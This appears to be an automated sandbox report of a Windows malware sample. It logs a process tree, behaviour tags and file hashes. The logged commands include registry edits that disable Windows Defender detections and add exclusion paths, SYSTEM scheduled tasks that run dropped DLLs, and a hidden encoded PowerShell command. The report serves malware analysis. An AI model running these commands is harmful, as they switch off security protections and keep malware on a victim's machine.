C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -p -s fhsvc1⤵
-
C:\Windows\system32\gpscript.exegpscript.exe /RefreshSystemParam1⤵
-
C:\Users\Admin\AppData\Local\Temp\PKTFfLRluxQTmPRqk\bWhXUEvIQwsbyrm\CxyCLWn.exeC:\Users\Admin\AppData\Local\Temp\PKTFfLRluxQTmPRqk\bWhXUEvIQwsbyrm\CxyCLWn.exe rw /site_id 525403 /S1⤵
- Executes dropped EXE
- Drops file in System32 directory
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"225451\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"225451\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"256596\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"256596\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"242872\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"242872\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749373\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749373\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147807942\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147807942\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735735\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735735\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737010\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737010\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737007\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737007\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737503\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737503\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735503\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735503\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749376\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749376\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737394\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737394\" /t REG_SZ /d 6 /reg:64;"2⤵
- Drops file in System32 directory
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 225451 /t REG_SZ /d 6 /reg:323⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 225451 /t REG_SZ /d 6 /reg:324⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 225451 /t REG_SZ /d 6 /reg:643⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 256596 /t REG_SZ /d 6 /reg:323⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 256596 /t REG_SZ /d 6 /reg:643⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 242872 /t REG_SZ /d 6 /reg:323⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 242872 /t REG_SZ /d 6 /reg:643⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749373 /t REG_SZ /d 6 /reg:323⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749373 /t REG_SZ /d 6 /reg:643⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147807942 /t REG_SZ /d 6 /reg:323⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147807942 /t REG_SZ /d 6 /reg:643⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735735 /t REG_SZ /d 6 /reg:323⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735735 /t REG_SZ /d 6 /reg:643⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737010 /t REG_SZ /d 6 /reg:323⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737010 /t REG_SZ /d 6 /reg:643⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737007 /t REG_SZ /d 6 /reg:323⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737007 /t REG_SZ /d 6 /reg:643⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737503 /t REG_SZ /d 6 /reg:323⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737503 /t REG_SZ /d 6 /reg:643⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6 /reg:323⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6 /reg:643⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749376 /t REG_SZ /d 6 /reg:323⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749376 /t REG_SZ /d 6 /reg:643⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737394 /t REG_SZ /d 6 /reg:323⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737394 /t REG_SZ /d 6 /reg:643⤵
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\BrFEHzbpwZEBC\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\BrFEHzbpwZEBC\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\ZFNizbZnU\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\ZFNizbZnU\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\aIaOnhtotwUn\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\aIaOnhtotwUn\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\gCafjQbERGAU2\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\gCafjQbERGAU2\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\ogOKxwoIKtPajjLdTvR\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\ogOKxwoIKtPajjLdTvR\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\ProgramData\euGiausHkJdtKpVB\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\ProgramData\euGiausHkJdtKpVB\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Temp\PKTFfLRluxQTmPRqk\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Temp\PKTFfLRluxQTmPRqk\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Windows\Temp\oCRUNVefZTIhACRx\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Windows\Temp\oCRUNVefZTIhACRx\" /t REG_DWORD /d 0 /reg:64;"2⤵
- Drops file in System32 directory
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\BrFEHzbpwZEBC" /t REG_DWORD /d 0 /reg:323⤵
-
C:\Windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\BrFEHzbpwZEBC" /t REG_DWORD /d 0 /reg:324⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\BrFEHzbpwZEBC" /t REG_DWORD /d 0 /reg:643⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\ZFNizbZnU" /t REG_DWORD /d 0 /reg:323⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\ZFNizbZnU" /t REG_DWORD /d 0 /reg:643⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\aIaOnhtotwUn" /t REG_DWORD /d 0 /reg:323⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\aIaOnhtotwUn" /t REG_DWORD /d 0 /reg:643⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\gCafjQbERGAU2" /t REG_DWORD /d 0 /reg:323⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\gCafjQbERGAU2" /t REG_DWORD /d 0 /reg:643⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\ogOKxwoIKtPajjLdTvR" /t REG_DWORD /d 0 /reg:323⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\ogOKxwoIKtPajjLdTvR" /t REG_DWORD /d 0 /reg:643⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\ProgramData\euGiausHkJdtKpVB /t REG_DWORD /d 0 /reg:323⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\ProgramData\euGiausHkJdtKpVB /t REG_DWORD /d 0 /reg:643⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\Users\Admin\AppData\Local\Temp\PKTFfLRluxQTmPRqk /t REG_DWORD /d 0 /reg:323⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\Users\Admin\AppData\Local\Temp\PKTFfLRluxQTmPRqk /t REG_DWORD /d 0 /reg:643⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\Windows\Temp\oCRUNVefZTIhACRx /t REG_DWORD /d 0 /reg:323⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\Windows\Temp\oCRUNVefZTIhACRx /t REG_DWORD /d 0 /reg:643⤵
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "gAGKRcGya" /SC once /ST 00:11:02 /F /RU "Admin" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA=="2⤵
- Creates scheduled task(s)
-
C:\Windows\SysWOW64\schtasks.exeschtasks /run /I /tn "gAGKRcGya"2⤵
-
C:\Windows\SysWOW64\schtasks.exeschtasks /DELETE /F /TN "gAGKRcGya"2⤵
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "iczjDJyUUtiHxBiey" /SC once /ST 03:15:52 /RU "SYSTEM" /TR "\"C:\Windows\Temp\oCRUNVefZTIhACRx\cBNzkoAEmSRwZre\WGyeiWG.exe\" pp /site_id 525403 /S" /V1 /F2⤵
- Drops file in Windows directory
- Creates scheduled task(s)
-
C:\Windows\SysWOW64\schtasks.exeschtasks /run /I /tn "iczjDJyUUtiHxBiey"2⤵
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXEC:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA==1⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\gpupdate.exe"C:\Windows\system32\gpupdate.exe" /force2⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -p -s fhsvc1⤵
-
C:\Windows\system32\gpscript.exegpscript.exe /RefreshSystemParam1⤵
-
C:\Windows\Temp\oCRUNVefZTIhACRx\cBNzkoAEmSRwZre\WGyeiWG.exeC:\Windows\Temp\oCRUNVefZTIhACRx\cBNzkoAEmSRwZre\WGyeiWG.exe pp /site_id 525403 /S1⤵
- Executes dropped EXE
- Checks computer location settings
- Drops Chrome extension
- Drops desktop.ini file(s)
- Drops file in System32 directory
- Drops file in Program Files directory
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
-
C:\Windows\SysWOW64\schtasks.exeschtasks /DELETE /F /TN "byLWBUphYKVPGqoaZN"2⤵
-
C:\Windows\SysWOW64\cmd.execmd /C REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /v "exe" /f /reg:322⤵
-
C:\Windows\SysWOW64\reg.exeREG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /v "exe" /f /reg:323⤵
-
C:\Windows\SysWOW64\cmd.execmd /C REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /v "exe" /f /reg:642⤵
-
C:\Windows\SysWOW64\reg.exeREG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /v "exe" /f /reg:643⤵
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TR "rundll32 \"C:\Program Files (x86)\ZFNizbZnU\mVPuHc.dll\",#1" /RU "SYSTEM" /SC ONLOGON /TN "BQFrhQQBtTmYywN" /V1 /F2⤵
- Drops file in Windows directory
- Creates scheduled task(s)
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "BQFrhQQBtTmYywN2" /F /xml "C:\Program Files (x86)\ZFNizbZnU\JqBTaRe.xml" /RU "SYSTEM"2⤵
- Creates scheduled task(s)
-
C:\Windows\SysWOW64\schtasks.exeschtasks /END /TN "BQFrhQQBtTmYywN"2⤵
-
C:\Windows\SysWOW64\schtasks.exeschtasks /DELETE /F /TN "BQFrhQQBtTmYywN"2⤵
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "ChuGjYZgDqNJsD" /F /xml "C:\Program Files (x86)\gCafjQbERGAU2\IEAkVXX.xml" /RU "SYSTEM"2⤵
- Creates scheduled task(s)
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "KRwEBWfCHIWgg2" /F /xml "C:\ProgramData\euGiausHkJdtKpVB\WUMZjPl.xml" /RU "SYSTEM"2⤵
- Creates scheduled task(s)
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "fBsmFGVnJakDbZanl2" /F /xml "C:\Program Files (x86)\ogOKxwoIKtPajjLdTvR\agmessv.xml" /RU "SYSTEM"2⤵
- Creates scheduled task(s)
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "NsBBRywtbBTnHSefQGy2" /F /xml "C:\Program Files (x86)\BrFEHzbpwZEBC\gkMxLOp.xml" /RU "SYSTEM"2⤵
- Creates scheduled task(s)
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "bdJibvckjBbeomyLL" /SC once /ST 02:37:38 /RU "SYSTEM" /TR "rundll32 \"C:\Windows\Temp\oCRUNVefZTIhACRx\cqqgsgst\idMTQsK.dll\",#1 /site_id 525403" /V1 /F2⤵
- Drops file in Windows directory
- Creates scheduled task(s)
-
C:\Windows\SysWOW64\schtasks.exeschtasks /run /I /tn "bdJibvckjBbeomyLL"2⤵
-
C:\Windows\SysWOW64\cmd.execmd /C REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /v "SpyNetReporting" /f /reg:322⤵
-
C:\Windows\SysWOW64\reg.exeREG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /v "SpyNetReporting" /f /reg:323⤵
-
C:\Windows\SysWOW64\cmd.execmd /C REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /v "SpyNetReporting" /f /reg:642⤵
-
C:\Windows\SysWOW64\reg.exeREG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /v "SpyNetReporting" /f /reg:643⤵
-
C:\Windows\SysWOW64\schtasks.exeschtasks /DELETE /F /TN "iczjDJyUUtiHxBiey"2⤵
-
C:\Windows\system32\rundll32.EXEC:\Windows\system32\rundll32.EXE "C:\Windows\Temp\oCRUNVefZTIhACRx\cqqgsgst\idMTQsK.dll",#1 /site_id 5254031⤵
-
C:\Windows\SysWOW64\rundll32.exeC:\Windows\system32\rundll32.EXE "C:\Windows\Temp\oCRUNVefZTIhACRx\cqqgsgst\idMTQsK.dll",#1 /site_id 5254032⤵
- Blocklisted process makes network request
- Checks BIOS information in registry
- Loads dropped DLL
- Enumerates system info in registry
- Modifies data under HKEY_USERS
-
C:\Windows\SysWOW64\schtasks.exeschtasks /DELETE /F /TN "bdJibvckjBbeomyLL"3⤵
Network
MITRE ATT&CK Matrix ATT&CK v6
Replay Monitor
Loading Replay Monitor...
Downloads
-
C:\Program Files (x86)\BrFEHzbpwZEBC\gkMxLOp.xmlFilesize
2KB
MD5349f79d9f033cd1abf5db043be076d5d
SHA1e563d4fa4003045e36cc5aa0abb07dd442c64a1f
SHA256ed267a4306cd0acf581b8eae579290764e266e55e3923e674e45288beeea1058
SHA5125e56c5ce3ef61ba2fd752f087bf4cb1a3b6e6e906630393286826703c9d0f108a543a9d5d37d95bc9161ce0893bfd62bda2d9d91ea7338e71870b6a8076ec7d9
-
C:\Program Files (x86)\ZFNizbZnU\JqBTaRe.xmlFilesize
2KB
MD5891120520596732ef356e2f7325ffd8c
SHA1aa6d0cd2f17a5c3117c5e022a20e193a02e3be83
SHA2566a321b71e8b5ecdc49845a4899860c2f2e1f97d941c513222df423475f0aa9ee
SHA512a6313201871df43a031805820effe6cc1397b8409e190d52d97e47970c993fae83f3043df7248723f0b35cfae761392d5a0d6c75572633b7bd612343f91a09b5
-
C:\Program Files (x86)\gCafjQbERGAU2\IEAkVXX.xmlFilesize
2KB
MD50bc6da0f75432089b38f37e609e3bb84
SHA16f76934cbe752134a10b65c40a5535b50873eac6
SHA25612aacd6ada66fc1205ea1bc63a71d8ba0fef846def820c65eda26ff5bf2e76bb
SHA5124fb44215d025274a416e5e1470139c02b744a3d4396eea1a1e6e28871354d761141bb104428c0227061ad92724fae29dc7ffdfa5da09236cfcc2219056ac48ad
-
C:\Program Files (x86)\ogOKxwoIKtPajjLdTvR\agmessv.xmlFilesize
2KB
MD53c1527d87f9d847f07c138ad8bcbb01d
SHA14b2cccc139d21edd232d03b3ec8d431067087dc5
SHA256e3ee487b2610395230804332331815f35654968d04db9a9da36b8d72a32991bb
SHA5126e2a9d03b19c61f54923ae0c6c042dff53573b2d6c056e7a8e462eb69e453222c1046c5f537c512ee23d2cdb671ebaf8892b0e0b33bc80bc80cac612efb0ffd5
-
C:\ProgramData\euGiausHkJdtKpVB\WUMZjPl.xmlFilesize
2KB
MD5321e4232844ac9d8a2e1fcda0153bd99
SHA10dd5ae142017be5962e605d61564e6f1c7f7ecb9
SHA256b21f5d873d020e6ff8f7ad85317cfc19bd07af3b8d545e51be9e1a49413a42ae
SHA5123f4be5fa4584ee7a339fc034e629b31f32b0d213c2d89315cfa036eeebebf59d62e3bda1e9945309fc1ee6294f8683264f3ab393716d2cccceef6f6e3f8cc9e2
-
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.EXE.logFilesize
2KB
MD56cf293cb4d80be23433eecf74ddb5503
SHA124fe4752df102c2ef492954d6b046cb5512ad408
SHA256b1f292b6199aa29c7fafbca007e5f9e3f68edcbbca1965bc828cc92dc0f18bb8
SHA5120f91e2da0da8794b9797c7b50eb5dfd27bde4546ceb6902a776664ce887dd6f12a0dd8773d612ccc76dfd029cd280778a0f0ae17ce679b3d2ffd968dd7e94a00
-
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractiveFilesize
64B
MD550a8221b93fbd2628ac460dd408a9fc1
SHA17e99fe16a9b14079b6f0316c37cc473e1f83a7e6
SHA25646e488628e5348c9c4dfcdeed5a91747eae3b3aa49ae1b94d37173b6609efa0e
SHA51227dda53e7edcc1a12c61234e850fe73bf3923f5c3c19826b67f2faf9e0a14ba6658001a9d6a56a7036409feb9238dd452406e88e318919127b4a06c64dba86f0
-
C:\Users\Admin\AppData\Local\Temp\7zS6DF1.tmp\Install.exeFilesize
6.3MB
MD50bd4ce3dbe52d5c651a16728d8d1ff70
SHA1555f748fbbaacc9a7e6cff87edb415954780036e
SHA256324d74d2d6cba61c6e15af514f0529c93d82df89af255e81e08cc495f4eacb0f
